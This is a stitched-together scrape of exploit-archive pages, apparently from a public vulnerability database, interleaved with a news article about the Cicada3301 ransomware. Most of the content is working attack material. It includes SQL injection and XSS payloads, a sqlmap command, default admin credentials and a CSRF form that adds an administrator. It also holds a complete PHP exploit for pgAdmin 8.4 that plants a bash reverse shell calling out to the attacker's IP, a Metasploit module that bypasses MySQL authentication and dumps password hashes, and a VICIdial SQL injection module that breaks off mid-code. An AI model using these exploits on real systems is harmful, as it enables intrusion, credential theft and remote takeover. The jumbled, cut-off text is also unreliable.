Webpay E-Commerce version 1.0 suffers from a remote SQL injection vulnerability.

    =============================================================================================================================================| # Title     : Webpay E-Commerce v1.0 SQL Injection Vulnerability                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : catproduct.php?catpro=6[+] E:\sqlmap>python sqlmap.py -u https://127.0.0.1/gajrajgraphicscomnp/home/catproduct.php?catpro=6 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs[+] Parameter: catpro (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: catpro=6' AND 5853=5853-- KEle    Type: UNION query    Title: Generic UNION query (NULL) - 15 columns    Payload: catpro=6' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6b71,0x646943714b4944576a41457943417a7652655a6579596c62475a63504a41756d7076426d65686e75,0x7171767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Webpay E-Commerce 1.0 SQL Injection

Cybersecurity researchers have unpacked the inner workings of a new ransomware variant called Cicada3301 that shares similarities with the now-defunct BlackCat (aka ALPHV) operation.
"It appears that Cicada3301 ransomware primarily targets small to medium-sized businesses (SMBs), likely through opportunistic attacks that exploit vulnerabilities as the initial access vector," cybersecurity

Cybersecurity researchers have unpacked the inner workings of a new ransomware variant called Cicada3301 that shares similarities with the now-defunct BlackCat (aka ALPHV) operation.

"It appears that Cicada3301 ransomware primarily targets small to medium-sized businesses (SMBs), likely through opportunistic attacks that exploit vulnerabilities as the initial access vector," cybersecurity company Morphisec said in a technical report shared with The Hacker News.

Written in Rust and capable of targeting both Windows and Linux/ESXi hosts, Cicada3301 first emerged in June 2024, inviting potential affiliates to join their ransomware-as-a-service (RaaS) platform via an advertisement on the RAMP underground forum.

A notable aspect of the ransomware is that the executable embeds the compromised user's credentials, which are then used to run PsExec, a legitimate tool that makes it possible to run programs remotely.

Cicada3301's similarities with BlackCat also extend to its use of ChaCha20 for encryption, fsutil to evaluate symbolic links and encrypt redirected files, as well as IISReset.exe to stop the IIS services and encrypt files that may otherwise be locked for for modification or deletion.

Other overlaps to BlackCat include steps undertaken to delete shadow copies, disable system recovery by manipulating the bcdedit utility, increase the MaxMpxCt value to support higher volumes of traffic (e.g., SMB PsExec requests), and clear all event logs by utilizing the wevtutil utility.

Cicada3301 has also observed stopping locally deployed virtual machines (VMs), a behavior previously adopted by the Megazord ransomware and the Yanluowang ransomware, and terminating various backup and recovery services and a hard-coded list of dozens of processes.

Besides maintaining a built-in list of excluded files and directories during the encryption process, the ransomware targets a total of 35 file extensions - sql, doc, rtf, xls, jpg, jpeg, psd, docm, xlsm, ods, ppsx, png, raw, dotx, xltx, pptx, ppsm, gif, bmp, dotm, xltm, pptm, odp, webp, pdf, odt, xlsb, ptox, mdf, tiff, docx, xlsx, xlam, potm, and txt.

Morphisec said its investigation also uncovered additional tools like EDRSandBlast that weaponize a vulnerable signed driver to bypass EDR detections, a technique also adopted by the BlackByte ransomware group in the past.

The findings follow Truesec's analysis of the ESXi version of Cicada3301, while also uncovering indications that the group may have teamed up with the operators of the Brutus botnet to obtain initial access to enterprise networks.

"Regardless of whether Cicada3301 is a rebrand of ALPHV, they have a ransomware written by the same developer as ALPHV, or they have just copied parts of ALPHV to make their own ransomware, the timeline suggests the demise of BlackCat and the emergence of first the Brutus botnet and then the Cicada3301 ransomware operation may possibly be all connected," the company noted.

The attacks against VMware ESXi systems also entail using intermittent encryption to encrypt files larger than a set threshold (100 MB) and a parameter named "no\_vm\_ss" to encrypt files without shutting down the virtual machines that are running on the host.

The emergence of Cicada3301 has also prompted an eponymous "non-political movement," which has dabbled in "mysterious" cryptographic puzzles, to issue a statement that it has no connection to the ransomware scheme.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Rust-Based Ransomware Cicada3301 Targets Windows and Linux Systems

Online Musical Instrument Shop IN version 1.0 suffers from a cross site scripting vulnerability.

**Online Musical Instrument Shop IN 1.0 Cross Site Scripting**

Posted Sep 2, 2024

Authored by indoushka

Online Musical Instrument Shop IN version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 2e3a9e009b49f67ad6f0534a437aba16431617d1d2588b6c4ed1087d4399d493

Download | Favorite | View

**Online Musical Instrument Shop IN 1.0 Cross Site Scripting**

    ====================================================================================================================================================| # Title     : Online Musical Instrument Shop IN v1.0 XSS Vulnerability                                                                           || # Author    : indoushka                                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                                   || # Vendor    : https://download-media.code-projects.org/2020/04/Online_Musical_Instrument_Shop_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip |====================================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : admin_area/login.php?not_admin=You%2520are%2520not%2520Admin.'"()%26%25<acx><ScRiPt >prompt(925772)</ScRiPt>[+] Panel : http://127.0.0.1/ecommerce/admin_area/login.php?not_admin=You%2520are%2520not%2520Admin.%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(925772)%3C/ScRiPt%3EGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,597)
*   Arbitrary (17,025)
*   BBS (2,859)
*   Bypass (1,898)
*   CGI (1,047)
*   Code Execution (7,867)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,418)
*   DoS (25,183)
*   Encryption (2,389)
*   Exploit (54,093)
*   File Inclusion (4,271)
*   File Upload (1,006)
*   Firewall (822)
*   Info Disclosure (2,910)
*   Intrusion Detection (916)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,249)
*   Local (14,833)
*   Magazine (587)
*   Overflow (13,203)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,399)
*   Protocol (3,745)
*   Python (1,651)
*   Remote (31,809)
*   Root (3,668)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,035)
*   Shell (3,295)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,291)
*   SQL Injection (16,692)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (671)
*   Vulnerability (33,046)
*   Web (10,128)
*   Whitepaper (3,782)
*   x86 (969)
*   XSS (18,277)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,114)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (50,978)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,661)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,794)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,756)
*   Other

Online Musical Instrument Shop IN 1.0 Cross Site Scripting

Online Job Portal IN version 1.0 suffers from a remote SQL injection vulnerability.

    =============================================================================================================================================| # Title     : Online Job Portal IN v1.0 SQL injection Vulnerability                                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Online_Job_Portal_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /refresh_job_search.php?experience=&qualification=fasd[+] http://127.0.0.1/Job-Portal-master/refresh_job_search.php?experience=&qualification=fasd <=== inject here[+] Login : /admin/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Job Portal IN 1.0 SQL Injection

pgAdmin versions 8.4 and earlier are affected by a remote reverse connection execution vulnerability via the binary path validation API.

    =============================================================================================================================================| # Title     : pgAdmin 8.4 PHP Code Execution Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.pgadmin.org/download/                                                                                           |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] pgAdmin versions 8.4 and earlier are affected by a remote reverse connection execution vulnerability via the binary path validation API.     This vulnerability allows an attacker to execute a reverse connection on the server hosting PGAdmin, posing a severe risk to the integrity   of the database management system and the security of the underlying data.  [+] Description:    The generateReverseShell function: Generates a reverse connection payload that uses netcat (or equivalent) to open a reverse connection with your machine. You will need to replace "YOUR_IP" and "YOUR_PORT" with your machine's IP address and the port you are listening on.    exec in PHP: Runs the command that opens a reverse connection using bash and executes it on the target.[+] How to use it:    Modify "YOUR_IP" and "YOUR_PORT" in the generateReverseShell function to match your machine.    Verify that your machine is listening on the specified port using nc or a similar tool:    nc -lvnp YOUR_PORT[+] Run the code. If the exploit is successful, you will get a reverse connection to the target machine.[+] Line : 156+157        $ip = 'YOUR_IP'; // Replace with your machine's IP        $port = 'YOUR_PORT'; // Replace with the port you want to use[+] Line : 164+165+166           $targetUrl = 'http://target-url.com'; // Replace this with the actual address           $username = 'admin'; // Username (if required)           $password = 'password'; // Password (if required)              [+] Save As poc.php[+] usage : cmd=> php poc.php[+] payload :<?phpclass PGAdminExploit {    private $targetUrl;    private $csrfToken;    private $username;    private $password;    public function __construct($targetUrl, $username = '', $password = '') {        $this->targetUrl = rtrim($targetUrl, '/');        $this->username = $username;        $this->password = $password;    }    public function exploit() {        if ($this->authRequired() && (!$this->username || !$this->password)) {            die("The application requires authentication, please provide valid credentials.\n");        }        if ($this->authRequired()) {            $this->authenticate();            echo "Successfully authenticated to pgAdmin\n";        }        if (!$this->onWindows()) {            die("This exploit is specific to Windows targets!\n");        }        $fileName = 'reverse_shell.php';        $this->fileManagerUploadAndTrigger($fileName, $this->generateReverseShell());    }    private function authRequired() {        $res = $this->sendRequest('GET', $this->targetUrl . '/');        return strpos($res, 'Location: login') !== false;    }    private function onWindows() {        $res = $this->sendRequest('GET', $this->targetUrl . '/browser/js/utils.js');        if ($res) {            $platform = $this->getStringBetween($res, "pgAdmin['platform'] = '", "';");            return $platform == 'win32';        }        return false;    }    private function authenticate() {        $loginPage = $this->sendRequest('GET', $this->targetUrl . '/login');        $this->setCsrfTokenFromLoginPage($loginPage);        $res = $this->sendRequest('POST', $this->targetUrl . '/authenticate/login', [            'csrf_token' => $this->csrfToken,            'email' => $this->username,            'password' => $this->password,            'language' => 'en',            'internal_button' => 'Login'        ]);        if (strpos($res, 'Location: login') !== false) {            die("Failed to authenticate to pgAdmin\n");        }    }    private function setCsrfTokenFromLoginPage($response) {        if (preg_match('/csrfToken": "([\w+.-]+)"/', $response, $matches)) {            $this->csrfToken = $matches[1];        } elseif (preg_match('/<input.*?id="csrf_token".*?value="(.*?)"/', $response, $matches)) {            $this->csrfToken = $matches[1];        } else {            die("Failed to obtain the CSRF token\n");        }    }    private function fileManagerUploadAndTrigger($filePath, $fileContents) {        list($transId, $homeFolder) = $this->fileManagerInit();        $formData = [            'newfile' => new CURLFile($filePath, 'application/octet-stream', $filePath),            'mode' => 'add',            'currentpath' => $homeFolder,            'storage_folder' => 'my_storage'        ];        $res = $this->sendRequest('POST', $this->targetUrl . "/file_manager/filemanager/{$transId}/", $formData, true);        if (strpos($res, '"success":1') === false) {            die("Failed to upload file contents\n");        }        $uploadPath = $this->getStringBetween($res, '"Name":"', '"');        echo "Payload uploaded to: {$uploadPath}\n";        $this->sendRequest('POST', $this->targetUrl . '/misc/validate_binary_path', json_encode([            'utility_path' => substr($uploadPath, 0, -15)        ]), true);    }    private function fileManagerInit() {        $res = $this->sendRequest('POST', $this->targetUrl . '/file_manager/init', json_encode([            'dialog_type' => 'storage_dialog',            'supported_types' => ['sql', 'csv', 'json', '*'],            'dialog_title' => 'Storage Manager'        ]));        $transId = $this->getStringBetween($res, '"transId":"', '"');        $homeFolder = $this->getStringBetween($res, '"homedir":"', '"');        if (!$transId || !$homeFolder) {            die("Failed to initialize a file manager transaction Id or home folder\n");        }        return [$transId, $homeFolder];    }    private function sendRequest($method, $url, $data = [], $multipart = false) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);        if ($method == 'POST') {            curl_setopt($ch, CURLOPT_POST, true);            if ($multipart) {                curl_setopt($ch, CURLOPT_POSTFIELDS, $data);            } else {                curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));            }        }        if ($this->csrfToken) {            curl_setopt($ch, CURLOPT_HTTPHEADER, [                "X-pgA-CSRFToken: {$this->csrfToken}"            ]);        }        $response = curl_exec($ch);        if (curl_errno($ch)) {            die("cURL Error: " . curl_error($ch) . "\n");        }        curl_close($ch);        return $response;    }    private function getStringBetween($string, $start, $end) {        $string = ' ' . $string;        $ini = strpos($string, $start);        if ($ini == 0) return '';        $ini += strlen($start);        $len = strpos($string, $end, $ini) - $ini;        return substr($string, $ini, $len);    }    private function generateReverseShell() {        // حمولة الاتصال العكسي باستخدام Netcat        $ip = 'YOUR_IP'; // استبدل بـ IP الخاص بجهازك        $port = 'YOUR_PORT'; // استبدل بالمنفذ الذي تريد استخدامه        $shell = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/$ip/$port 0>&1'\"); ?>";        return $shell;    }}// مثال على الاستخدام$targetUrl = 'http://target-url.com'; // استبدل هذا بالعنوان الحقيقي$username = 'admin'; // اسم المستخدم (إذا كان مطلوبًا)$password = 'password'; // كلمة المرور (إذا كانت مطلوبة)$exploit = new PGAdminExploit($targetUrl, $username, $password);$exploit->exploit();?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

pgAdmin 8.4 Code Execution 

Loan Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

**Loan Management System 2024 1.0 Insecure Settings**

Posted Sep 2, 2024

Authored by indoushka

Loan Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 4e37e483991ec7b37ab54ed035920c62f7033979ca509714b26270c8fabb131b

Download | Favorite | View

**Loan Management System 2024 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Loan Management System 2024 v1.0 Insecure Settings Vulnerability                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15529/loan-management-system-oop-php-mysqlijquery-free-source-code.html                  |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin[+] https://www/127.0.0.1/165.232.176.12/index.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,597)
*   Arbitrary (17,025)
*   BBS (2,859)
*   Bypass (1,898)
*   CGI (1,047)
*   Code Execution (7,867)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,418)
*   DoS (25,183)
*   Encryption (2,389)
*   Exploit (54,093)
*   File Inclusion (4,271)
*   File Upload (1,006)
*   Firewall (822)
*   Info Disclosure (2,910)
*   Intrusion Detection (916)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,249)
*   Local (14,833)
*   Magazine (587)
*   Overflow (13,203)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,399)
*   Protocol (3,745)
*   Python (1,651)
*   Remote (31,809)
*   Root (3,668)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,035)
*   Shell (3,295)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,291)
*   SQL Injection (16,692)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (671)
*   Vulnerability (33,046)
*   Web (10,128)
*   Whitepaper (3,782)
*   x86 (969)
*   XSS (18,277)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,114)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (50,978)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,661)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,794)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,756)
*   Other

Loan Management System 2024 1.0 Insecure Settings

File Management System version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : File Management System 1.0 CSRF Add Admin Vulnerability                                                                     || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.campcodes.com/downloads/file-management-system-in-php-mysql-source-code/?wpdmdl=7992&refresh=66bba3bd946da1723573181                           |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 1 : Set your target.[+] Save As poc.html[+] Payload :  <form action="http://127.0.0.1/filemanagement/Private_Dashboard/create_Admin.php" method="POST">  <div class="modal-dialog" role="document">    <div class="modal-content">      <div class="modal-header text-center">        <h4 class="modal-title w-100 font-weight-bold"><i class="fas fa-user-plus"></i> Add Admin</h4>        <button type="button" class="close" data-dismiss="modal" aria-label="Close">          <span aria-hidden="true">&times;</span>        </button>      </div>      <div class="modal-body mx-3">           <div class="md-form mb-5">          <input type="hidden" id="orangeForm-name" name="status" value = "Admin" class="form-control validate">        </div>        <div class="md-form mb-5">          <i class="fas fa-user prefix grey-text"></i>          <input type="text" id="orangeForm-name" name="name" class="form-control validate" required="">          <label data-error="wrong" data-success="right" for="orangeForm-name">Your name</label>        </div>        <div class="md-form mb-5">          <i class="fas fa-envelope prefix grey-text"></i>          <input type="email" id="orangeForm-email" name="admin_user" class="form-control validate" required="">          <label data-error="wrong" data-success="right" for="orangeForm-email">Your email</label>        </div>        <div class="md-form mb-4">          <i class="fas fa-lock prefix grey-text"></i>          <input type="password" id="orangeForm-pass" name="admin_password" class="form-control validate" required="">          <label data-error="wrong" data-success="right" for="orangeForm-pass">Your password</label>        </div>      </div>      <div class="modal-footer d-flex justify-content-center">        <button class="btn btn-info" name="reg">Sign up</button>    Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

File Management System 1.0 Cross Site Request Forgery

This Metasploit module exploits a password bypass vulnerability in MySQL in order to extract the usernames and encrypted password hashes from a MySQL server. These hashes are stored as loot for later cracking. Impacts MySQL versions: - 5.1.x before 5.1.63 - 5.5.x before 5.5.24 - 5.6.x before 5.6.6 And MariaDB versions: - 5.1.x before 5.1.62 - 5.2.x before 5.2.12 - 5.3.x before 5.3.6 - 5.5.x before 5.5.23.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'rex/proto/mysql/client'class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::MYSQL  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  def initialize    super(      'Name'           => 'MySQL Authentication Bypass Password Dump',      'Description'    => %Q{        This module exploits a password bypass vulnerability in MySQL in order        to extract the usernames and encrypted password hashes from a MySQL server.        These hashes are stored as loot for later cracking.        Impacts MySQL versions:        - 5.1.x before 5.1.63        - 5.5.x before 5.5.24        - 5.6.x before 5.6.6        And MariaDB versions:        - 5.1.x before 5.1.62        - 5.2.x before 5.2.12        - 5.3.x before 5.3.6        - 5.5.x before 5.5.23      },      'Author'        => [          'theLightCosine', # Original hashdump module          'jcran' # Authentication bypass bruteforce implementation        ],      'References'     => [          ['CVE', '2012-2122'],          ['OSVDB', '82804'],          ['URL', 'https://www.rapid7.com/blog/post/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql/']        ],      'DisclosureDate' => 'Jun 09 2012',      'License'        => MSF_LICENSE    )    deregister_options('PASSWORD')    register_options( [      OptString.new('USERNAME', [ true, 'The username to authenticate as', "root" ])    ])  end  def run_host(ip)    # Keep track of results (successful connections)    results = []    # Username and password placeholders    username = datastore['USERNAME']    password = Rex::Text.rand_text_alpha(rand(8)+1)    # Do an initial check to see if we can log into the server at all    begin      socket = connect(false)      close_required = true      mysql_client = ::Rex::Proto::MySQL::Client.connect(rhost, username, password, nil, rport, io: socket)      results << mysql_client      close_required = false      print_good "#{mysql_client.peerhost}:#{mysql_client.peerport} The server accepted our first login as #{username} with a bad password. URI: mysql://#{username}:#{password}@#{mysql_client.peerhost}:#{mysql_client.peerport}"    rescue ::Rex::Proto::MySQL::Client::HostNotPrivileged      print_error "#{rhost}:#{rport} Unable to login from this host due to policy (may still be vulnerable)"      return    rescue ::Rex::Proto::MySQL::Client::AccessDeniedError      print_good "#{rhost}:#{rport} The server allows logins, proceeding with bypass test"    rescue ::Interrupt      raise $!    rescue ::Exception => e      print_error "#{rhost}:#{rport} Error: #{e}"      return    ensure      socket.close if socket && close_required    end    # Short circuit if we already won    if results.length > 0      self.mysql_conn = results.first      return dump_hashes(mysql_client.peerhost, mysql_client.peerport)    end    #    # Threaded login checker    #    max_threads = 16    cur_threads = []    # Try up to 1000 times just to be sure    queue   = [*(1 .. 1000)]    while(queue.length > 0)      while(cur_threads.length < max_threads)        # We can stop if we get a valid login        break if results.length > 0        # keep track of how many attempts we've made        item = queue.shift        # We can stop if we reach 1000 tries        break if not item        # Status indicator        print_status "#{rhost}:#{rport} Authentication bypass is #{item/10}% complete" if (item % 100) == 0        t = Thread.new(item) do |count|          begin            # Create our socket and make the connection            close_required = true            s = connect(false)            mysql_client = ::Rex::Proto::MySQL::Client.connect(rhost, username, password, nil, rport, io: s)            print_good "#{mysql_client.peerhost}:#{mysql_client.peerport} Successfully bypassed authentication after #{count} attempts. URI: mysql://#{username}:#{password}@#{rhost}:#{rport}"            results << mysql_client            close_required = false          rescue ::Rex::Proto::MySQL::Client::AccessDeniedError          rescue ::Exception => e            print_bad "#{rhost}:#{rport} Thread #{count}] caught an unhandled exception: #{e}"          ensure            s.close if socket && close_required          end        end        cur_threads << t      end      # We can stop if we get a valid login      break if results.length > 0      # Add to a list of dead threads if we're finished      cur_threads.each_index do |ti|        t = cur_threads[ti]        if not t.alive?          cur_threads[ti] = nil        end      end      # Remove any dead threads from the set      cur_threads.delete(nil)      ::IO.select(nil, nil, nil, 0.25)    end    # Clean up any remaining threads    cur_threads.each {|x| x.kill }    if results.length > 0      print_good("#{mysql_client.peerhost}:#{mysql_client.peerport} Successfully exploited the authentication bypass flaw, dumping hashes...")      self.mysql_conn = results.first      return dump_hashes(mysql_client.peerhost, mysql_client.peerport)    end    print_error("#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable")  end  def dump_hashes(host, port)    # Grabs the username and password hashes and stores them as loot    res = mysql_query("SELECT user,password from mysql.user")    if res.nil?      print_error("#{host}:#{port} There was an error reading the MySQL User Table")      return    end    # Create a table to store data    tbl = Rex::Text::Table.new(      'Header'  => 'MysQL Server Hashes',      'Indent'   => 1,      'Columns' => ['Username', 'Hash']    )    if res.size > 0      res.each do |row|        next unless (row[0].to_s + row[1].to_s).length > 0        tbl << [row[0], row[1]]        print_good("#{host}:#{port} Saving HashString as Loot: #{row[0]}:#{row[1]}")      end    end    this_service = nil    if framework.db and framework.db.active      this_service = report_service(        :host  => host,        :port => port,        :name => 'mysql',        :proto => 'tcp'      )    end    report_hashes(tbl.to_csv, this_service, host, port) unless tbl.rows.empty?  end  # Stores the Hash Table as Loot for Later Cracking  def report_hashes(hash_loot,service, host, port)    filename= "#{host}-#{port}_mysqlhashes.txt"    path = store_loot("mysql.hashes", "text/plain", host, hash_loot, filename, "MySQL Hashes", service)    print_good("#{host}:#{port} Hash Table has been saved: #{path}")  endend

MySQL Authentication Bypass Password Dump

This Metasploit module exploits several authenticated SQL Inject vulnerabilities in VICIdial 2.14b0.5 prior to svn/trunk revision 3555 (VICIBox 10.0.0, prior to January 20 is vulnerable). Injection point 1 is on vicidial/admin.php when adding a user, in the modify_email_accounts parameter. Injection point 2 is on vicidial/admin.php when adding a user, in the access_recordings parameter. Injection point 3 is on vicidial/admin.php when adding a user, in the agentcall_email parameter. Injection point 4 is on vicidial/AST_agent_time_sheet.php when adding a user, in the agent parameter. Injection point 5 is on vicidial/user_stats.php when adding a user, in the file_download parameter. VICIdial does not encrypt passwords by default.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Scanner  include Msf::Exploit::SQLi  def initialize(info = {})    super(      update_info(        info,        'Name' => 'VICIdial Multiple Authenticated SQLi',        'Description' => %q{          This module exploits several authenticated SQL Inject vulnerabilities in VICIdial 2.14b0.5 prior to          svn/trunk revision 3555 (VICIBox 10.0.0, prior to January 20 is vulnerable).          Injection point 1 is on vicidial/admin.php when adding a user, in the modify_email_accounts parameter.          Injection point 2 is on vicidial/admin.php when adding a user, in the access_recordings parameter.          Injection point 3 is on vicidial/admin.php when adding a user, in the agentcall_email parameter.          Injection point 4 is on vicidial/AST_agent_time_sheet.php when adding a user, in the agent parameter.          Injection point 5 is on vicidial/user_stats.php when adding a user, in the file_download parameter.          VICIdial does not encrypt passwords by default.        },        'Author' => [          'h00die' # msf module, discovery        ],        'License' => MSF_LICENSE,        'References' => [          [ 'URL', 'https://www.vicidial.org/VICIDIALforum/viewtopic.php?f=4&t=41300&sid=aacb27a29fefd85265b4d55fe51122af'],          [ 'CVE', '2022-34876'], # admin.php          [ 'CVE', '2022-34877'], # AST_agent_time_sheet.php          [ 'CVE', '2022-34878'] # user_stats.php        ],        'Actions' => [          ['List Users - modify_email_accounts method', { 'Description' => 'Queries username, password for COUNT users' }],          ['List Users - access_recordings method', { 'Description' => 'Queries username, password for COUNT users' }],          ['List Users - agentcall_email method', { 'Description' => 'Queries username, password for COUNT users' }],          ['List Users - agent_time_sheet method', { 'Description' => 'Queries username, password for COUNT users' }],          ['List Users - user_stats method', { 'Description' => 'Queries username, password for COUNT users' }],        ],        'DefaultAction' => 'List Users',        'DisclosureDate' => '2022-04-19',        'Notes' => {          'Stability' => [CRASH_SAFE],          'SideEffects' => [IOC_IN_LOGS],          'Reliability' => []        }      )    )    register_options [      OptInt.new('COUNT', [false, 'Number of users to enumerate', 3]),      OptString.new('USERNAME', [true, 'Valid Username for login', '6666']),      OptString.new('PASSWORD', [true, 'Valid Password for login', '']),      OptString.new('ACTION', [true, 'Valid Password for login', 'List Users - access_recordings method'])    ]  end  def post_4a    {      'ADD' => '4A',      'custom_fields_modify' => '0',      'user' => '111',      'pass' => '111',      'force_change_password' => 'N',      'full_name' => '111',      'user_level' => '1',      'user_group' => 'ADMIN',      'phone_login' => '111',      'phone_pass' => '111',      'active' => 'Y',      'voicemail_id' => '',      'email' => '',      'mobile_number' => '',      'user_code' => '',      'user_location' => '',      'territory' => '',      'user_nickname' => '',      'user_new_lead_limit' => '-1',      'agent_choose_ingroups' => '1',      'agent_choose_blended' => '1',      'hotkeys_active' => '0',      'scheduled_callbacks' => '1',      'agentonly_callbacks' => '0',      'next_dial_my_callbacks' => 'NOT_ACTIVE',      'agentcall_manual' => '0',      'manual_dial_filter' => 'DISABLED',      'agentcall_email' => '0',      'agentcall_chat' => '0',      'vicidial_recording' => '1',      'vicidial_transfers' => '1',      'closer_default_blended' => '0',      'user_choose_language' => '0',      'selected_language' => 'defaultEnglish',      'vicidial_recording_override' => 'DISABLED',      'mute_recordings' => 'DISABLED',      'alter_custdata_override' => 'NOT_ACTIVE',      'alter_custphone_override' => 'NOT_ACTIVE',      'agent_shift_enforcement_override' => 'DISABLED',      'agent_call_log_view_override' => 'DISABLED',      'hide_call_log_info' => 'DISABLED',      'agent_lead_search' => 'NOT_ACTIVE',      'lead_filter_id' => 'NONE',      'user_hide_realtime' => '0',      'allow_alerts' => '0',      'preset_contact_search' => 'NOT_ACTIVE',      'max_inbound_calls' => '0',      'max_inbound_filter_enabled' => '0',      'max_inbound_filter_min_sec' => '-1',      'max_hopper_calls' => '0',      'max_hopper_calls_hour' => '0',      'wrapup_seconds_override' => '-1',      'ready_max_logout' => '-1',      'status_group_id' => '',      'custom_one' => '',      'custom_two' => '',      'custom_three' => '',      'custom_four' => '',      'custom_five' => '',      'qc_enabled' => '0',      'qc_user_level' => '1',      'qc_pass' => '0',      'qc_finish' => '0',      'qc_commit' => '0',      'realtime_block_user_info' => '0',      'admin_hide_lead_data' => '0',      